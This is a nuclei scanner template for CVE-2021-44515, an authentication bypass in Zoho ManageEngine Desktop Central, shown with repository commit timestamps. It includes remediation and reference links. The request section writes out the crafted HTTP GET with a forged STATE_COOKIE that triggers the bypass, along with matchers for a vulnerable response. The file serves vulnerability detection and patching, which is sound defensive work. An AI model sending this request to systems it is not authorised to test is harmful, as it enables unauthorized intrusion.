nuclei-templates/http/cves/2021/CVE-2021-44515.yaml

50 lines
2.2 KiB
YAML
Raw Normal View History

id: CVE-2021-44515
info:
name: Zoho ManageEngine Desktop Central - Remote Code Execution
author: Adam Crosser
severity: critical
description: Zoho ManageEngine Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server.
2023-09-06 12:09:01 +00:00
remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.
reference:
- https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog
- https://srcincite.io/blog/2022/01/20/zohowned-a-critical-authentication-bypass-on-zoho-manageengine-desktop-central.html
- https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis
- https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp
- https://nvd.nist.gov/vuln/detail/CVE-2021-44515
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-44515
cwe-id: CWE-287
2023-10-14 11:27:55 +00:00
epss-score: 0.97297
epss-percentile: 0.99842
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:enterprise:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: zohocorp
product: manageengine_desktop_central
2023-12-05 09:50:33 +00:00
tags: cve,cve2021,zoho,rce,manageengine,kev,zohocorp
http:
- raw:
- |
GET /STATE_ID/123/agentLogUploader HTTP/1.1
Host: {{Hostname}}
Cookie: STATE_COOKIE=&_REQS/_TIME/123
matchers-condition: and
matchers:
- type: dsl
dsl:
- "len(body) == 0"
- type: word
part: header
words:
- "UEMJSESSIONID="
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
# digest: 4a0a004730450221008fbc392bb76bcd0933cfc96412b3f0536244f75d7a4a68d899f51079fdd3c35a02202016905995fcbfc1e62ffc4dc530b01656db2eb10c0e0190215258ea00b54b2b:922c64590222798bb761d5b6d8e72950